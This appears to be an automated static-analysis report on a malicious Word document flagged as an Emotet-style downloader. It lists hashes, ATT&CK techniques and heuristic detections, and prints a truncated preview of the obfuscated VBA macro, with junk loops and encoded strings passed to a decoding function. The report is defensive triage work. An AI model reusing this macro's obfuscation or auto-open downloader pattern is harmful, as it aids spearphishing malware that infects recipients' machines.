Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 54cfe48a0c9f51ee…

MALICIOUS

Office (OLE)

181.5 KB Created: 2018-03-26 18:43:00 Authoring application: Microsoft Office Word First seen: 2018-09-04
MD5: c30dc00a61821005166e80223aa9011d SHA-1: 3d86ccf4d752fb24aad32220c1ccda82df4035e0 SHA-256: 54cfe48a0c9f51ee96ea74e57674f58773550a4768d60f60fca703dd77bdaab8
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The file is identified as malicious by ClamAV and exhibits multiple high-severity heuristic firings related to VBA macros, including the presence of an AutoOpen macro and CreateObject calls. The extracted VBA macro, 'macros.bas', likely contains obfuscated code that attempts to download and execute a second-stage payload, as indicated by the 'hEimG' function calls which appear to be decoding strings that could represent URLs or commands. The presence of an AutoOpen macro suggests an attempt to automatically execute malicious code upon opening the document, aligning with the Spearphishing Attachment technique.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 42129 bytes
SHA-256: 79a40fbd872ec6191bb00804a30c40b7d5b321a6323597966ab177f3a7d17635
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 19 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ZJTYkmLi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lJMAkYi"
Function oRobtGTz()
On Error Resume Next
For Each bfhpw In dSjuwN
      YXimKJ = 94096 - zcTqL
      For Each qzolkQ In WMUBOT
         AlCXP = ziJjwn
      Next
   Next
VEjNOloiaQq = hEimG("kzMb@iAZQBlAGUAMQA4ADIAMgBhAGMAMQsX", 7, 27)
For Each ubCOz In BmTvIN
      lCKOkw = 81478 - LNawaZ
      For Each MpEmzA In uJFCbR
         hquJS = uUvzC
      Next
   Next
For Each EHUYa In GsmMI
      HnCcS = 15663 - jIMXmM
      For Each Lndwi In zSMaD
         dQqmid = Jbwim
      Next
   Next
zzhvWBiK = hEimG("5DbwDgAYgAzAGEAMAAzADcANgBmADEAMgBiADcAOQAyAGQAMwA5ADkAYgBiADYANgA1ADc43", 5, 66)
For Each VljMs In iLGNTO
      iwZpbc = 48681 - iZtVhu
      For Each DsNFqt In ZPFTq
         XXDWX = zLkmXF
      Next
   Next
For Each wknww In NzuNf
      DafTTl = 46208 - ToGdZ
      For Each tvFcm In pjRjVI
         XFwahH = DjibAJ
      Next
   Next
JbtdbuB = hEimG(".AMABkAGIAZQAwADIAYwBiAGEAMQBiADQAMwBiAGYAMwAzADAAOAAxADKn2,S", 2, 55)
For Each iCJiKY In YSsRaF
      XJwzL = 95881 - BXOYV
      For Each zJNdcd In KdHFLj
         wmEIHC = faldoL
      Next
   Next
For Each cmHkki In hIaJP
      lXLAi = 52856 - EbRiQ
      For Each qjCbZF In jjCjl
         qWvFb = CtJSj
      Next
   Next
udjKZV = hEimG("WAGEANABjADIAOQA2ADUAYQBjADIANwA3AGMAMgAzADMAOQBiADEAZAA0ADMAOAAxADIAMQA4AGQAZgA4ADYANgA0AGYANgBlADcAMwAwAGQANgA1ADcAZAAxADMAYwBiADkAMQA3ADAAYwBjADQANwBhADYAZQA3AGEANwAzADcAMvf7T6", 2, 173)
For Each IaQbB In dTvsa
      hADziC = 40216 - PFkjJV
      For Each HOvjQW In RfzIh
         CSdwvQ = aTDKH
      Next
   Next
For Each wkvXuH In lJwIp
      PQSlAT = 28075 - vVsYLT
      For Each VWbTbF In pntmm
         BhnBi = UUzBwQ
      Next
   Next
GzwKXdH = hEimG("DojQA5AGYANwA4ADMAOAA0ADAAMgAwADAAMwBkADAAMAAyADcAZQBkAGIAMgAzADEAMABjAGEAZQAyAGUAMAA3ADUANAAxAGEANQA3ADMAYQBlADEAYgBkADIANQBhADQAYgBkAGQAMQA1ADAANQAzADEAOABiAGYAMQBkAGIANwAxADYAOmbz", 4, 176)
For Each wDOCwi In CPmXpO
      PbfsNh = 1948 - NiruLz
      For Each VVfCrG In aluEwL
         uPLQUE = UJijjA
      Next
   Next
For Each ZBUpuG In vItbAW
      ORjft = 30046 - OCzYb
      For Each idalF In zasUj
         Zpjlr = EZCAB
      Next
   Next
daEmZQCLdM = hEimG("8iKjrRZQBhADMAZgBjAGMAMgBmADMAYQA0ADQAMwA1ADEAZABlAGUAMwA3AGMAYwBlAGMAYgBiADEAZgAzADAAYQBkADUAZQBlAGMAOABkADgANAA0ADYAZgA2ADQAMgA5AGEAMwBlADgAMQAxADYAMABlAGOw", 7, 150)
For Each bbsZLw In RTCHR
      IWwYrW = 93757 - MTaRc
      For Each jTBBd In wKdLXP
         AOAWhS = iuHAK
      Next
   Next
For Each rluWh In icoXG
      mpBIwP = 77748 - LUHYwT
      For Each QKYKHj In iOofaN
         ikkCR = zQCiD
      Next
   Next
IjdDtzjS = hEimG("2ANgBmADkAMQA1ADkAYwAzADAAMwBjAGIAOAAxADUANQBhADAAZgBkAGQAZAAxADkAMAA5AGYAZQAwADYAOABhAGMANQA3ADMAOAAzADcANAA1ADEAMwAwAGMAYgBhAGEAYwAxADIAMAAxAGUANgA0AGMAZgAwAGIAYQBjAGQANQBlA54OYJUd", 2, 174)
For Each LLXdW In OtNRP
      wLHKm = 37391 - obTdj
      For Each VfKjA In qGlVT
         kSGMT = QVXEF
      Next
   Next
For Each UqizOX In DkYjz
      CJDSi = 48657 - vJvsS
      For Each BtOuV In qNlIZw
         UDJzC = HUlbSG
      Next
   Next
ldEXMazZvD = hEimG("5J@jBiADEAYwA1AGUAYQA5ADAANgBjADMAMgA0AGIAOQBlADcAOQBmADkQSi", 5, 53)
For Each KLzLu In jJVSoq
      AIFQB = 57974 - fFGlJ
      For Each tLkQSw In wXfOZN
         PtwlVJ = zwOUZo
      Next
   Next
For Each jntAb In zRGOZt
      pEWDm = 76430 - jitHn
      For Each ShKKm In qkBJH
         YPFrA = ZLqMl
      Next
   Next
hBHNUkj = hEimG("pf23ADkAOQA1ADUAO2nh", 4, 14)
For Each XVXAiF In lNSZPH
      cHDjou = 29174 - NYLrdY
      For Each bSFvOm In upGvP
         tGppk = sRIHY
      Next
   Next
For Each kawzO In OjzNY
      CsunIf = 61138 - REjoSi
      For Each htflf In FbNbB
         TQVsZ = HkXQMt
   
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.